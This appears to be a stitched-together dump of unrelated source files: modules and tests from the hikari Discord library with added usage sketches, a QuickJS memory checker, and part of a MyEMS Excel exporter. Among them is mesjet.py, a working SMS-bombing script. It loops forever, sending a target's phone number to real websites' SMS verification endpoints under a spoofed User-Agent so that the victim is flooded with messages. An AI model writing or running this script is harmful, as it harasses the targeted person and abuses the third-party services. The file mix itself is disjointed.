"""Exception triplet that follows the same format as `sys.exc_info`.
Returns
-------
builtins.tuple[typing.Type[Exception], Exception, typing.Optional[types.TracebackType]]
The `sys.exc_info`-compatible tuple of the exception type, the
exception instance, and the traceback of the exception.
"""
return type(self.exception), self.exception, self.exception.__traceback__
async def retry(self) -> None:
"""Invoke the failed event again.
If an exception is thrown this time, it will need to be manually
caught in-code, or will be discarded.
"""
await self.failed_callback(self.failed_event)
```
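A hedged sketch of how the two helpers above are meant to be applied; `MyCustomEvent` is purely illustrative and not part of hikari.

```python
import typing

from hikari import intents, traits
from hikari.events.base_events import Event, get_required_intents_for, requires_intents


@requires_intents(intents.Intents.GUILD_MESSAGES)
class MyCustomEvent(Event):
    """Illustrative event type; not shipped with hikari."""

    __slots__: typing.Sequence[str] = ("_app",)

    def __init__(self, app: traits.RESTAware) -> None:
        self._app = app

    @property
    def app(self) -> traits.RESTAware:
        return self._app


# The decorator records the intents so a dispatcher can read them back.
assert intents.Intents.GUILD_MESSAGES in get_required_intents_for(MyCustomEvent)
```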
#### File: hikari/events/scheduled_events.py
```python
from __future__ import annotations
__all__: typing.Sequence[str] = [
"ScheduledEventEvent",
"ScheduledEventCreateEvent",
"ScheduledEventDeleteEvent",
"ScheduledEventUpdateEvent",
"ScheduledEventUserAddEvent",
"ScheduledEventUserRemoveEvent",
]
import abc
import typing
import attr
from hikari import intents
from hikari.events import base_events
from hikari.events import shard_events
from hikari.internal import attr_extensions
if typing.TYPE_CHECKING:
from hikari import scheduled_events
from hikari import snowflakes
from hikari import traits
from hikari.api import shard as gateway_shard
@base_events.requires_intents(intents.Intents.GUILD_SCHEDULED_EVENTS)
class ScheduledEventEvent(shard_events.ShardEvent, abc.ABC):
"""Event bassed for any scheduled event related events."""
__slots__: typing.Sequence[str] = ()
@property
@abc.abstractmethod
def event_id(self) -> snowflakes.Snowflake:
"""ID of the scheduled event."""
@attr_extensions.with_copy
@attr.define(kw_only=True, weakref_slot=False)
@base_events.requires_intents(intents.Intents.GUILD_SCHEDULED_EVENTS)
class ScheduledEventCreateEvent(ScheduledEventEvent):
"""Event fired when a guild scheduled event is created."""
shard: gateway_shard.GatewayShard = attr.field(metadata={attr_extensions.SKIP_DEEP_COPY: True})
# <<inherited docstring from ShardEvent>>.
event: scheduled_events.ScheduledEvent = attr.field()
"""The scheduled event that was created."""
@property
def app(self) -> traits.RESTAware:
# <<inherited docstring from Event>>.
return self.event.app
@property
def event_id(self) -> snowflakes.Snowflake:
# <<inherited docstring from ScheduledEventEvent>>.
return self.event.id
@attr_extensions.with_copy
@attr.define(kw_only=True, weakref_slot=False)
@base_events.requires_intents(intents.Intents.GUILD_SCHEDULED_EVENTS)
class ScheduledEventDeleteEvent(ScheduledEventEvent):
"""Event fired when a guild scheduled event is deleted."""
shard: gateway_shard.GatewayShard = attr.field(metadata={attr_extensions.SKIP_DEEP_COPY: True})
# <<inherited docstring from ShardEvent>>.
event: scheduled_events.ScheduledEvent = attr.field()
"""The scheduled event that was deleted."""
@property
def app(self) -> traits.RESTAware:
# <<inherited docstring from Event>>.
return self.event.app
@property
def event_id(self) -> snowflakes.Snowflake:
# <<inherited docstring from ScheduledEventEvent>>.
return self.event.id
@attr_extensions.with_copy
@attr.define(kw_only=True, weakref_slot=False)
@base_events.requires_intents(intents.Intents.GUILD_SCHEDULED_EVENTS)
class ScheduledEventUpdateEvent(ScheduledEventEvent):
"""Event fired when a guild scheduled event is updated."""
shard: gateway_shard.GatewayShard = attr.field(metadata={attr_extensions.SKIP_DEEP_COPY: True})
# <<inherited docstring from ShardEvent>>.
event: scheduled_events.ScheduledEvent = attr.field()
"""The scheduled event that was updated."""
@property
def app(self) -> traits.RESTAware:
# <<inherited docstring from Event>>.
return self.event.app
@property
def event_id(self) -> snowflakes.Snowflake:
# <<inherited docstring from ScheduledEventEvent>>.
return self.event.id
@attr_extensions.with_copy
@attr.define(kw_only=True, weakref_slot=False)
@base_events.requires_intents(intents.Intents.GUILD_SCHEDULED_EVENTS)
class ScheduledEventUserAddEvent(ScheduledEventEvent):
"""Event fired when a user subscribes to a guild scheduled event."""
app: traits.RESTAware = attr.field(metadata={attr_extensions.SKIP_DEEP_COPY: True})
# <<inherited docstring from Event>>.
shard: gateway_shard.GatewayShard = attr.field(metadata={attr_extensions.SKIP_DEEP_COPY: True})
# <<inherited docstring from ShardEvent>>.
event_id: snowflakes.Snowflake = attr.field()
"""ID of the scheduled event that the user was added to."""
user_id: snowflakes.Snowflake = attr.field()
"""ID of the user that was added to the scheduled event."""
guild_id: snowflakes.Snowflake = attr.field()
"""ID of the guild that the scheduled event belongs to."""
@attr_extensions.with_copy
@attr.define(kw_only=True, weakref_slot=False)
@base_events.requires_intents(intents.Intents.GUILD_SCHEDULED_EVENTS)
class ScheduledEventUserRemoveEvent(ScheduledEventEvent):
"""Event fired when a user unsubscribes from a guild scheduled event."""
app: traits.RESTAware = attr.field(metadata={attr_extensions.SKIP_DEEP_COPY: True})
# <<inherited docstring from Event>>.
shard: gateway_shard.GatewayShard = attr.field(metadata={attr_extensions.SKIP_DEEP_COPY: True})
# <<inherited docstring from ShardEvent>>.
event_id: snowflakes.Snowflake = attr.field()
"""ID of the scheduled event that the user was removed from."""
user_id: snowflakes.Snowflake = attr.field()
"""ID of the user that was removed from the scheduled event."""
guild_id: snowflakes.Snowflake = attr.field()
"""ID of the guild that the scheduled event belongs to."""
```
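A hedged sketch of subscribing to one of these events, following the same listener pattern as the `hello_world.py` example earlier; the token handling and intent choice are assumptions.

```python
import os

import hikari
from hikari.events.scheduled_events import ScheduledEventCreateEvent

# GUILD_SCHEDULED_EVENTS is required, per the requires_intents decorators above.
bot = hikari.GatewayBot(
    token=os.environ["BOT_TOKEN"],
    intents=hikari.Intents.GUILD_SCHEDULED_EVENTS,
)


@bot.listen()
async def on_scheduled_event_create(event: ScheduledEventCreateEvent) -> None:
    # event_id is provided by the ScheduledEventEvent base class.
    print(f"Scheduled event {event.event_id} created in guild {event.event.guild_id}")


bot.run()
```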
#### File: hikari/internal/time.py
```python
from __future__ import annotations
__all__: typing.List[str] = [
"DISCORD_EPOCH",
"datetime_to_discord_epoch",
"discord_epoch_to_datetime",
"unix_epoch_to_datetime",
"Intervalish",
"timespan_to_int",
"local_datetime",
"utc_datetime",
"monotonic",
"monotonic_ns",
"uuid",
]
import datetime
import time
import typing
import uuid as uuid_
Intervalish = typing.Union[int, float, datetime.timedelta]
"""Type hint representing a naive time period or time span.
This is a type that is like an interval of some sort.
This is an alias for `typing.Union[int, float, datetime.timedelta]`,
where `builtins.int` and `builtins.float` types are interpreted as a number of seconds.
"""
DISCORD_EPOCH: typing.Final[int] = 1_420_070_400
"""Discord epoch used within snowflake identifiers.
This is defined as the number of seconds between
`1/1/1970 00:00:00 UTC` and `1/1/2015 00:00:00 UTC`.
References
----------
* [Discord API documentation - Snowflakes](https://discord.com/developers/docs/reference#snowflakes)
"""
# Default to the standard lib parser, that isn't really ISO compliant but seems
# to work for what we need.
def slow_iso8601_datetime_string_to_datetime(datetime_str: str) -> datetime.datetime:
"""Parse an ISO-8601-like datestring into a datetime.
Parameters
----------
datetime_str : builtins.str
The date string to parse.
Returns
-------
datetime.datetime
The corresponding date time.
"""
if datetime_str.endswith(("z", "Z")):
# Python's parser cannot handle zulu time, it isn't a proper ISO-8601 compliant parser.
datetime_str = datetime_str[:-1] + "+00:00"
return datetime.datetime.fromisoformat(datetime_str)
fast_iso8601_datetime_string_to_datetime: typing.Optional[typing.Callable[[str], datetime.datetime]]
try:
# CISO8601 is around 600x faster than modules like dateutil, which is
# going to be noticeable on big bots where you are parsing hundreds of
# thousands of "joined_at" fields on users on startup.
import ciso8601
# Discord appears to actually use RFC-3339, which isn't a true ISO-8601 implementation,
# but somewhat of a subset with some edge cases.
# See https://tools.ietf.org/html/rfc3339#section-5.6
fast_iso8601_datetime_string_to_datetime = ciso8601.parse_rfc3339
except ImportError:
fast_iso8601_datetime_string_to_datetime = None
iso8601_datetime_string_to_datetime: typing.Callable[[str], datetime.datetime] = (
fast_iso8601_datetime_string_to_datetime or slow_iso8601_datetime_string_to_datetime
)
def discord_epoch_to_datetime(epoch: int, /) -> datetime.datetime:
"""Parse a Discord epoch into a `datetime.datetime` object.
Parameters
----------
epoch : builtins.int
Number of milliseconds since `1/1/2015 00:00:00 UTC`.
Returns
-------
datetime.datetime
        The corresponding UTC date/time.
"""
return datetime.datetime.fromtimestamp(epoch / 1_000 + DISCORD_EPOCH, datetime.timezone.utc)
def datetime_to_discord_epoch(timestamp: datetime.datetime) -> int:
"""Parse a `datetime.datetime` object into an `builtins.int` `DISCORD_EPOCH` offset.
Parameters
----------
timestamp : datetime.datetime
        The date/time to convert to a Discord epoch offset.
Returns
-------
builtins.int
Number of milliseconds since `1/1/2015 00:00:00 UTC`.
"""
return int((timestamp.timestamp() - DISCORD_EPOCH) * 1_000)
def unix_epoch_to_datetime(epoch: typing.Union[int, float], /, *, is_millis: bool = True) -> datetime.datetime:
"""Parse a UNIX epoch to a `datetime.datetime` object.
!!! note
If an epoch that's outside the range of what this system can handle,
this will return `datetime.datetime.max` if the timestamp is positive,
or `datetime.datetime.min` otherwise.
Parameters
----------
epoch : typing.Union[builtins.int, builtins.float]
Number of seconds/milliseconds since `1/1/1970 00:00:00 UTC`.
is_millis : builtins.bool
`builtins.True` by default, indicates the input timestamp is measured in
milliseconds rather than seconds
Returns
-------
datetime.datetime
        The corresponding UTC date/time.
"""
# Datetime seems to raise an OSError when you try to convert an out of range timestamp on Windows and a ValueError
# if you try on a UNIX system so we want to catch both.
try:
epoch /= (is_millis * 1_000) or 1
return datetime.datetime.fromtimestamp(epoch, datetime.timezone.utc)
except (OSError, ValueError):
if epoch > 0:
return datetime.datetime.max
else:
return datetime.datetime.min
def timespan_to_int(value: Intervalish, /) -> int:
"""Cast the given timespan in seconds to an integer value.
Parameters
----------
value : Intervalish
The number of seconds.
Returns
-------
builtins.int
The integer number of seconds. Fractions are discarded. Negative values
are removed.
"""
if isinstance(value, datetime.timedelta):
value = value.total_seconds()
return int(max(0, value))
def local_datetime() -> datetime.datetime:
"""Return the current date/time for the system's time zone."""
return utc_datetime().astimezone()
def utc_datetime() -> datetime.datetime:
"""Return the current date/time for UTC (GMT+0)."""
return datetime.datetime.now(tz=datetime.timezone.utc)
# time.monotonic_ns is no slower than time.monotonic, but is more accurate.
# Also, fun fact that monotonic_ns appears to be 1µs faster on average than
# monotonic on ARM64 architectures, but on x86, monotonic is around 1ns faster
# than monotonic_ns. Just thought that was kind of interesting to note down.
# (RPi 3B versus i7 6700)
# time.perf_counter and time.perf_counter_ns don't have proper typehints, causing
# pdoc to not be able to recognise them. This is just a little hack around that.
def monotonic() -> float:
"""Performance counter for benchmarking.""" # noqa: D401 - Imperative mood
return time.perf_counter()
def monotonic_ns() -> int:
"""Performance counter for benchmarking as nanoseconds.""" # noqa: D401 - Imperative mood
return time.perf_counter_ns()
def uuid() -> str:
"""Generate a unique UUID (1ns precision)."""
return uuid_.uuid1(None, monotonic_ns()).hex
```
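A small sketch exercising the epoch helpers above; the timestamps are arbitrary, and the import path assumes hikari's internal layout shown in the file header.

```python
from hikari.internal.time import (
    datetime_to_discord_epoch,
    discord_epoch_to_datetime,
    unix_epoch_to_datetime,
    utc_datetime,
)

now = utc_datetime()
discord_ms = datetime_to_discord_epoch(now)      # milliseconds since the Discord epoch
back = discord_epoch_to_datetime(discord_ms)     # back to an aware UTC datetime
assert abs((back - now).total_seconds()) < 0.01  # only sub-millisecond truncation is lost

# The same UNIX timestamp given in milliseconds (default) and in seconds:
print(unix_epoch_to_datetime(1_420_070_400_000))
print(unix_epoch_to_datetime(1_420_070_400, is_millis=False))
```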
#### File: hikaki/hikari/scheduled_events.py
```python
from __future__ import annotations
__all__: typing.Sequence[str] = [
"EventPrivacyLevel",
"ScheduledEventType",
"ScheduledEventStatus",
"ScheduledEvent",
"ScheduledExternalEvent",
"ScheduledStageEvent",
"ScheduledVoiceEvent",
"ScheduledEventUser",
]
import typing
import attr
from hikari import snowflakes
from hikari import urls
from hikari.internal import attr_extensions
from hikari.internal import enums
from hikari.internal import routes
if typing.TYPE_CHECKING:
import datetime
from hikari import files
from hikari import guilds
from hikari import traits
from hikari import users
class EventPrivacyLevel(int, enums.Enum):
"""Enum of the possible scheduled event privacy levels."""
GUILD_ONLY = 2
"""The scheduled event is only available to guild members."""
class ScheduledEventType(int, enums.Enum):
"""Enum of the scheduled event types."""
STAGE_INSTANCE = 1
"""A scheduled stage instance."""
VOICE = 2
"""A scheculed voice chat event."""
EXTERNAL = 3
"""A scheduled event which takes part outside of Discord."""
class ScheduledEventStatus(int, enums.Enum):
"""Enum of the scheduled event statuses."""
SCHEDULED = 1
"""Indicates that the scheduled event hasn't occurred yet."""
ACTIVE = 2
"""Indicates an eventis on-going."""
COMPLETED = 3
"""Indicates an event has finished."""
CANCELED = 4
"""Indicates an event has been canceled."""
CANCELLED = CANCELED
"""Alias of `ScheduledEventStatus.CANCELED`."""
@attr_extensions.with_copy
@attr.define(hash=True, kw_only=True, weakref_slot=False)
class ScheduledEvent(snowflakes.Unique):
"""Base class for scheduled events."""
# entity_id is ignored right now due to always being null
# creator_id is ignored as it just dupes creator.id
app: traits.RESTAware = attr.field(
repr=False, eq=False, hash=False, metadata={attr_extensions.SKIP_DEEP_COPY: True}
)
"""The client application that models may use for procedures."""
id: snowflakes.Snowflake = attr.field(hash=True, repr=True)
"""ID of the scheduled event."""
guild_id: snowflakes.Snowflake = attr.field(hash=False, repr=True)
"""ID of the guild this scheduled event belongs to."""
name: str = attr.field(hash=False, repr=True)
"""Name of the scheduled event."""
description: typing.Optional[str] = attr.field(hash=False, repr=False)
"""Description of the scheduled event."""
start_time: datetime.datetime = attr.field(hash=False, repr=False)
"""When the event is scheduled to start."""
end_time: typing.Optional[datetime.datetime] = attr.field(hash=False, repr=False)
"""When the event is scheduled to end, if set."""
privacy_level: EventPrivacyLevel = attr.field(hash=False, repr=False)
"""Privacy level of the scheduled event.
This restricts who can view and join the scheduled event.
"""
status: ScheduledEventStatus = attr.field(hash=False, repr=True)
"""Status of the scheduled event."""
entity_type: ScheduledEventType = attr.field(hash=False, repr=True)
"""The type of entity this scheduled event is associated with."""
creator: typing.Optional[users.User] = attr.field(hash=False, repr=False)
"""The user who created the scheduled event.
This will only be set for event created after 2021-10-25.
"""
user_count: typing.Optional[int] = attr.field(hash=False, repr=False)
"""The number of users that have subscribed to the event.
This will be `builtins.None` on gateway events when creating and
editing a scheduled event.
"""
image_hash: typing.Optional[str] = attr.field(hash=False, repr=False)
"""Hash of the image used for the scheduled event, if set."""
@property
def image_url(self) -> typing.Optional[files.URL]:
"""Cover image for this scheduled event, if set."""
return self.make_image_url()
def make_image_url(self, *, ext: str = "png", size: int = 4096) -> typing.Optional[files.URL]:
"""Generate the cover image for this scheduled event, if set.
Parameters
----------
ext : builtins.str
The extension to use for this URL, defaults to `png`.
Supports `png`, `jpeg`, `jpg` and `webp`.
size : builtins.int
The size to set for the URL, defaults to `4096`.
Can be any power of two between 16 and 4096.
Returns
-------
typing.Optional[hikari.files.URL]
The URL, or `builtins.None` if no cover image is set.
Raises
------
builtins.ValueError
If `size` is not a power of two between 16 and 4096 (inclusive).
"""
if self.image_hash is None:
return None
return routes.SCHEDULED_EVENT_COVER.compile_to_file(
urls.CDN_URL,
scheduled_event_id=self.id,
hash=self.image_hash,
size=size,
file_format=ext,
)
@attr_extensions.with_copy
@attr.define(hash=True, kw_only=True, weakref_slot=False)
class ScheduledExternalEvent(ScheduledEvent):
"""A scheduled event that takes place outside of Discord."""
location: str = attr.field(hash=False, repr=False)
"""The location of the scheduled event.
!!! note
There is no strict format for this field, and it will likely be a user
friendly string.
"""
end_time: datetime.datetime = attr.field(hash=False, repr=False)
"""When the event is scheduled to end."""
@attr_extensions.with_copy
@attr.define(hash=True, kw_only=True, weakref_slot=False)
class ScheduledStageEvent(ScheduledEvent):
"""A scheduled event that takes place in a stage channel."""
channel_id: snowflakes.Snowflake = attr.field(hash=False, repr=False)
"""ID of the stage channel this event is scheduled in."""
@attr_extensions.with_copy
@attr.define(hash=True, kw_only=True, weakref_slot=False)
class ScheduledVoiceEvent(ScheduledEvent):
"""A scheduled event that takes place in a voice channel."""
channel_id: snowflakes.Snowflake = attr.field(hash=False, repr=False)
"""ID of the voice channel this scheduled event is in."""
@attr_extensions.with_copy
@attr.define(kw_only=True, weakref_slot=False)
class ScheduledEventUser:
"""A user who is subscribed to a scheduled event."""
event_id: snowflakes.Snowflake = attr.field(hash=False, repr=True)
"""ID of the scheduled event they're subscribed to."""
user: users.User = attr.field(hash=True, repr=True)
"""Object representing the user."""
member: typing.Optional[guilds.Member] = attr.field(hash=False, repr=False)
"""Their guild member object if they're in the event's guild."""
```
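A brief hedged sketch of consuming the cover image helper defined above; the event instance is assumed to come from the REST client or the cache.

```python
import typing

from hikari import files
from hikari.scheduled_events import ScheduledEvent


def cover_url(event: ScheduledEvent) -> typing.Optional[files.URL]:
    # 512px webp cover image, or None when the event has no image set.
    return event.make_image_url(ext="webp", size=512)
```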
#### File: tests/hikari/test_presences.py
```python
import mock
import pytest
from hikari import files
from hikari import presences
from hikari import snowflakes
from hikari import urls
from hikari.impl import bot
from hikari.internal import routes
@pytest.fixture()
def mock_app():
return mock.Mock(spec_set=bot.GatewayBot)
class TestActivityAssets:
def test_large_image_url_property(self):
asset = presences.ActivityAssets(
application_id=None,
large_image=None,
large_text=None,
small_image=None,
small_text=None,
)
with mock.patch.object(presences.ActivityAssets, "make_large_image_url") as make_large_image_url:
result = asset.large_image_url
assert result is make_large_image_url.return_value
make_large_image_url.assert_called_once_with()
def test_large_image_url_property_when_runtime_error(self):
asset = presences.ActivityAssets(
application_id=None,
large_image=None,
large_text=None,
small_image=None,
small_text=None,
)
with mock.patch.object(
presences.ActivityAssets, "make_large_image_url", side_effect=RuntimeError
) as make_large_image_url:
result = asset.large_image_url
assert result is None
make_large_image_url.assert_called_once_with()
def test_make_large_image_url(self):
asset = presences.ActivityAssets(
application_id=45123123,
large_image="541sdfasdasd",
large_text=None,
small_image=None,
small_text=None,
)
with mock.patch.object(routes, "CDN_APPLICATION_ASSET") as route:
assert asset.make_large_image_url(ext="fa", size=3121) is route.compile_to_file.return_value
route.compile_to_file.assert_called_once_with(
urls.CDN_URL,
application_id=45123123,
hash="541sdfasdasd",
size=3121,
file_format="fa",
)
def test_make_large_image_url_when_no_hash(self):
asset = presences.ActivityAssets(
application_id=None,
large_image=None,
large_text=None,
small_image=None,
small_text=None,
)
assert asset.make_large_image_url() is None
@pytest.mark.parametrize(
("asset_hash", "expected"), [("mp:541sdfasdasd", "https://media.discordapp.net/541sdfasdasd")]
)
def test_make_large_image_url_when_dynamic_url(self, asset_hash: str, expected: str):
asset = presences.ActivityAssets(
application_id=None,
large_image=asset_hash,
large_text=None,
small_image=None,
small_text=None,
)
assert asset.make_large_image_url() == files.URL(expected)
def test_make_large_image_url_when_unknown_dynamic_url(self):
asset = presences.ActivityAssets(
application_id=None,
large_image="uwu:nou",
large_text=None,
small_image=None,
small_text=None,
)
with pytest.raises(RuntimeError, match="Unknown asset type"):
asset.make_large_image_url()
def test_small_image_url_property(self):
asset = presences.ActivityAssets(
application_id=None,
large_image=None,
large_text=None,
small_image=None,
small_text=None,
)
with mock.patch.object(presences.ActivityAssets, "make_small_image_url") as make_small_image_url:
result = asset.small_image_url
assert result is make_small_image_url.return_value
make_small_image_url.assert_called_once_with()
def test_small_image_url_property_when_runtime_error(self):
asset = presences.ActivityAssets(
application_id=None,
large_image=None,
large_text=None,
small_image=None,
small_text=None,
)
with mock.patch.object(
presences.ActivityAssets, "make_small_image_url", side_effect=RuntimeError
) as make_small_image_url:
result = asset.small_image_url
assert result is None
make_small_image_url.assert_called_once_with()
def test_make_small_image_url(self):
asset = presences.ActivityAssets(
application_id=123321,
large_image=None,
large_text=None,
small_image="aseqwsdas",
small_text=None,
)
with mock.patch.object(routes, "CDN_APPLICATION_ASSET") as route:
assert asset.make_small_image_url(ext="eat", size=123312) is route.compile_to_file.return_value
route.compile_to_file.assert_called_once_with(
urls.CDN_URL,
application_id=123321,
hash="aseqwsdas",
size=123312,
file_format="eat",
)
def test_make_small_image_url_when_no_hash(self):
asset = presences.ActivityAssets(
application_id=None,
large_image=None,
large_text=None,
small_image=None,
small_text=None,
)
assert asset.make_small_image_url() is None
@pytest.mark.parametrize(("asset_hash", "expected"), [("mp:4123fdssdf", "https://media.discordapp.net/4123fdssdf")])
def test_make_small_image_url_when_dynamic_url(self, asset_hash: str, expected: str):
asset = presences.ActivityAssets(
application_id=None,
large_image=None,
large_text=None,
small_image=asset_hash,
small_text=None,
)
assert asset.make_small_image_url() == files.URL(expected)
def test_make_small_image_url_when_unknown_dynamic_url(self):
asset = presences.ActivityAssets(
application_id=None,
large_image=None,
large_text=None,
small_image="meow:nyaa",
small_text=None,
)
with pytest.raises(RuntimeError, match="Unknown asset type"):
asset.make_small_image_url()
class TestActivity:
def test_str_operator(self):
activity = presences.Activity(name="something", type=presences.ActivityType(1))
assert str(activity) == "something"
class TestMemberPresence:
@pytest.fixture()
def model(self, mock_app):
return presences.MemberPresence(
app=mock_app,
user_id=snowflakes.Snowflake(432),
guild_id=snowflakes.Snowflake(234),
visible_status=presences.Status.ONLINE,
activities=mock.Mock(presences.RichActivity),
client_status=mock.Mock(presences.ClientStatus),
)
@pytest.mark.asyncio()
async def test_fetch_user(self, model):
model.app.rest.fetch_user = mock.AsyncMock()
assert await model.fetch_user() is model.app.rest.fetch_user.return_value
model.app.rest.fetch_user.assert_awaited_once_with(432)
@pytest.mark.asyncio()
async def test_fetch_member(self, model):
model.app.rest.fetch_member = mock.AsyncMock()
assert await model.fetch_member() is model.app.rest.fetch_member.return_value
model.app.rest.fetch_member.assert_awaited_once_with(234, 432)
``` |
{
"source": "81Vm3/mesjet",
"score": 2
} |
#### File: 81Vm3/mesjet/mesjet.py
```python
import sys, requests, time
fake_headers = {
"User-Agent" : "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
}
def getTickCount():
return int(round(time.time() * 1000))
def keyboardInterruptExit():
print("\nThe mission has been canceled.")
exit()
class CExploit():
def __init__(self, name, url, delay, post_or_get, data):
self.name = str(name)
self.url = str(url)
self.delay = int(delay)
self.post_or_get = bool(post_or_get) #post is true whereas get is false
self.data = data #can be json or parameters
self.last_send = 0
def setMobile(self, pmobile):
if self.post_or_get:
for i in self.data:
if type(self.data[i]) == str: #is string
if self.data[i] == "__MOBILE":
self.data[i] = str(pmobile)
else:
if type(self.data) == str:
self.data = self.data.replace("__MOBILE", str(pmobile)) #it"s for get
def perform(self):
try:
if self.post_or_get:
r = requests.post(self.url, data=self.data, headers=fake_headers)
print(r.text)
#print(r.status_code)
else:
#print(self.url + self.data)
r = requests.get(self.url + self.data, headers=fake_headers)
print(r.text)
#print(r.status_code)
except KeyboardInterrupt:
keyboardInterruptExit()
except:
print("Failed to call \"%s\"" % (self.name))
exploits = [
#------USEFUL------
CExploit("OCQ云智能管理", "http://app.imocq.com/login/registerInMobilePhone", 60, True, {"emailMobilePhone":"__MOBILE"}),
CExploit("四川省特种设备考试机构报名系统", "http://t.scasei.org.cn/ajax/send-mobile-code", 30, True, {"mobile":"__MOBILE", "usage":"register"}),
#------USEFUL------
#CExploit("大V店", "http://s.davdian.com/index.php?c=sms&a=send", 60, True, {"mobile":"__MOBILE"}),
#CExploit("Dfv", "http://www.defuv.com/index.php/Ajax/send_msg", 60, False, "?mobile=__MOBILE"),
#CExploit("迪卡侬", "https://www.decathlon.com.cn/zh/ajax/rest/model/atg/userprofiling/ProfileActor/send-mobile-verification-code", 30, True, {"countryCode":"CN","mobile":"__MOBILE"}),
#CExploit("潇x书院", "https://www.xxsy.net/Reg/Actions", 120, True, {"method":"sms", "mobile":"__MOBILE", "uname":"__MOBILE", "imgcode":"", "token":"<KEY>"}),
#########由于某种未知原因无法使用
#CExploit("私募排排网", "https://fof.simuwang.com/index.php?c=Login&a=getRegisterPhoneCode", 60, False, "&phone=__MOBILE"),
#CExploit("超级简历", "https://www.wondercv.com/verify_tokens/phone", 60, True, {"phone_number":"__MOBILE"}),
#CExploit("和讯", "https://reg.hexun.com/ajax/login_ajax.aspx", 60, True, {"mobile":"__MOBILE", "verifycode":"", "act": "sendsms_login"}),
#CExploit("华图在线", "http://api.huatu.com/lumenapi/v4/common/message/send_by_java", 60, False, "?mobile=__MOBILE"),
#CExploit("快速注册通道", "http://j.seo691.com/register/getverify.html", 90, False, "?reg_mobile=__MOBILE"),
#########
]
if len(sys.argv) < 2:
print("""usage: [phone-number] [delay]
phone-number --- The target you want to attack.
delay --- Millisecond, to slow the script down instead of done all performance at time.""")
print("The script currently has a total of %d exploits. (You can open & edit the script for adding more)" % (len(exploits)))
exit()
target = sys.argv[1]
delay = sys.argv[2]
for i in range(len(exploits)):
exploits[i].setMobile(int(target))
last_send = 0
try:
while(True):
for i in range(len(exploits)):
if (getTickCount() - last_send) > 1000:
if (getTickCount() - exploits[i].last_send) > exploits[i].delay:
exploits[i].perform()
last_send = exploits[i].ticks = getTickCount()
except KeyboardInterrupt:
keyboardInterruptExit()
``` |
{
"source": "821938089/quickjs",
"score": 2
} |
#### File: 821938089/quickjs/check_memory.py
```python
import gc
import tracemalloc
import unittest
import quickjs
import test_quickjs
def run():
loader = unittest.TestLoader()
suite = loader.discover(".")
runner = unittest.TextTestRunner()
runner.run(suite)
filters = [
tracemalloc.Filter(True, quickjs.__file__),
tracemalloc.Filter(True, test_quickjs.__file__),
]
def main():
print("Warming up (to discount regex cache etc.)")
run()
tracemalloc.start(25)
gc.collect()
snapshot1 = tracemalloc.take_snapshot().filter_traces(filters)
run()
gc.collect()
snapshot2 = tracemalloc.take_snapshot().filter_traces(filters)
top_stats = snapshot2.compare_to(snapshot1, 'traceback')
print("Objects not released")
print("====================")
for stat in top_stats:
if stat.size_diff == 0:
continue
print(stat)
for line in stat.traceback.format():
print(" ", line)
print("\nquickjs should not show up above.")
if __name__ == "__main__":
main()
``` |
{
"source": "823914102/myems-api",
"score": 2
} |
#### File: myems-api/excelexporters/spacesaving.py
```python
import base64
import uuid
import os
from openpyxl.chart import (
PieChart,
BarChart,
Reference,
)
from openpyxl.styles import PatternFill, Border, Side, Alignment, Font
from openpyxl.drawing.image import Image
from openpyxl import Workbook
from openpyxl.chart.label import DataLabelList
####################################################################################################################
# PROCEDURES
# Step 1: Validate the report data
# Step 2: Generate excel file
# Step 3: Encode the excel file bytes to Base64
####################################################################################################################
def export(report,
name,
reporting_start_datetime_local,
reporting_end_datetime_local,
period_type):
####################################################################################################################
# Step 1: Validate the report data
####################################################################################################################
if report is None:
return None
print(report)
####################################################################################################################
# Step 2: Generate excel file from the report data
####################################################################################################################
filename = generate_excel(report,
name,
reporting_start_datetime_local,
reporting_end_datetime_local,
period_type)
####################################################################################################################
# Step 3: Encode the excel file to Base64
####################################################################################################################
try:
with open(filename, 'rb') as binary_file:
binary_file_data = binary_file.read()
except IOError as ex:
pass
# Base64 encode the bytes
base64_encoded_data = base64.b64encode(binary_file_data)
# get the Base64 encoded data using human-readable characters.
base64_message = base64_encoded_data.decode('utf-8')
# delete the file from server
try:
os.remove(filename)
except NotImplementedError as ex:
pass
return base64_message
def generate_excel(report,
name,
reporting_start_datetime_local,
reporting_end_datetime_local,
period_type):
wb = Workbook()
ws = wb.active
# Row height
ws.row_dimensions[1].height = 118
for i in range(2, 2000 + 1):
ws.row_dimensions[i].height = 30
# Col width
ws.column_dimensions['A'].width = 1.5
ws.column_dimensions['B'].width = 25.0
for i in range(ord('C'), ord('I')):
ws.column_dimensions[chr(i)].width = 25.0
# Font
name_font = Font(name='Constantia', size=15, bold=True)
name_small_font = Font(name='Constantia', size=10, bold=True)
title_font = Font(name='宋体', size=15, bold=True)
title_small_font = Font(name='宋体', size=10, bold=True)
data_font = Font(name='Franklin Gothic Book', size=11)
table_fill = PatternFill(fill_type='solid', fgColor='1F497D')
f_border = Border(left=Side(border_style='medium', color='00000000'),
right=Side(border_style='medium', color='00000000'),
bottom=Side(border_style='medium', color='00000000'),
top=Side(border_style='medium', color='00000000')
)
b_border = Border(
bottom=Side(border_style='medium', color='00000000'),
)
b_c_alignment = Alignment(vertical='bottom',
horizontal='center',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0)
c_c_alignment = Alignment(vertical='center',
horizontal='center',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0)
b_r_alignment = Alignment(vertical='bottom',
horizontal='right',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0)
c_r_alignment = Alignment(vertical='bottom',
horizontal='center',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0)
# Img
img = Image("excelexporters/myems.png")
# img = Image("myems.png")
ws.add_image(img, 'B1')
# Title
ws['B3'].font = name_font
ws['B3'].alignment = b_r_alignment
ws['B3'] = 'Name:'
ws['C3'].border = b_border
ws['C3'].alignment = b_c_alignment
ws['C3'].font = name_font
ws['C3'] = name
ws['D3'].font = name_font
ws['D3'].alignment = b_r_alignment
ws['D3'] = 'Period:'
ws['E3'].border = b_border
ws['E3'].alignment = b_c_alignment
ws['E3'].font = name_font
ws['E3'] = period_type
ws['F3'].font = name_font
ws['F3'].alignment = b_r_alignment
ws['F3'] = 'Date:'
ws.merge_cells("G3:J3")
for i in range(ord('G'), ord('K')):
ws[chr(i) + '3'].border = b_border
ws['G3'].alignment = b_c_alignment
ws['G3'].font = name_font
ws['G3'] = reporting_start_datetime_local + "__" + reporting_end_datetime_local
